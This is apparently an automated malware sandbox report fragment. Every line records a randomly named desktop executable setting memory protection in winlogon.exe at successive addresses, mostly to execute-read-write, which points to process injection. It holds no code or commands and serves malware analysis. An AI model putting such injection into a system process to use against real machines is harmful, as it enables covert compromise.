Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: C940000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: C941000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: C956000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: C959000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: C95B000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: C960000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: C961000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: C976000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: C979000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: C97B000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: C980000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: C981000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: C996000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: C999000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: C99B000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: C9A0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: C9A1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: C9B6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: C9B9000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: C9BB000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: C9C0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: C9C1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: C9D6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: C9D9000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: C9DB000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: C9E0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: C9E1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: C9F6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: C9F9000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: C9FB000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CA00000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CA01000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CA16000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CA19000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CA1B000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CA20000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CA21000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CA36000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CA39000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CA3B000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CA40000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CA41000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CA56000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CA59000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CA5B000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CA60000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CA61000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CA76000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CA79000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CA7B000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CA80000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CA81000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CA96000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CA99000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CA9B000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CAA0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CAA1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CAB6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CAB9000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CABB000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CAC0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CAC1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CAD6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CAD9000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CADB000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CAE0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CAE1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CAF6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CAF9000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CAFB000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB00000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB01000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB16000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB19000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB1B000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB20000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB21000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB36000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB39000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB3B000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB40000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB41000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB56000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB59000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB5B000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB60000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB61000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB76000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB79000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB7B000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB80000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB81000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB96000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB99000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB9B000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CBA0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CBA1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CBB6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CBB9000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CBBB000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CBC0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CBC1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CBD6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CBD9000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CBDB000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CBE0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CBE1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CBF6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CBF9000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CBFB000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC00000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC01000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC16000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC19000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC1B000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC20000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC21000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC36000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC39000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC3B000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC40000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC41000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC56000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC59000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC5B000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC60000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC61000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC76000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC79000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC7B000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC80000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC81000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC96000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC99000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC9B000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CCA0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CCA1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CCB6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CCB9000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CCBB000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CCC0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CCC1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CCD6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CCD9000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CCDB000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CCE0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CCE1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CCF6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CCF9000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CCFB000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD00000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD01000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD16000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD19000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD1B000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD20000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD21000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD36000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD39000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD3B000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD40000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD41000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD56000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD59000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD5B000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD60000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD61000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD76000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD79000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD7B000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD80000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD81000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD96000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD99000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD9B000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CDA0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CDA1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CDB6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CDB9000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CDBB000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CDC0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CDC1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CDD6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CDD9000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CDDB000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CDE0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CDE1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CDF6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CDF9000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CDFB000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE00000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE01000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE16000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE19000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE1B000 protect: page execute and read and writeJump to behavior
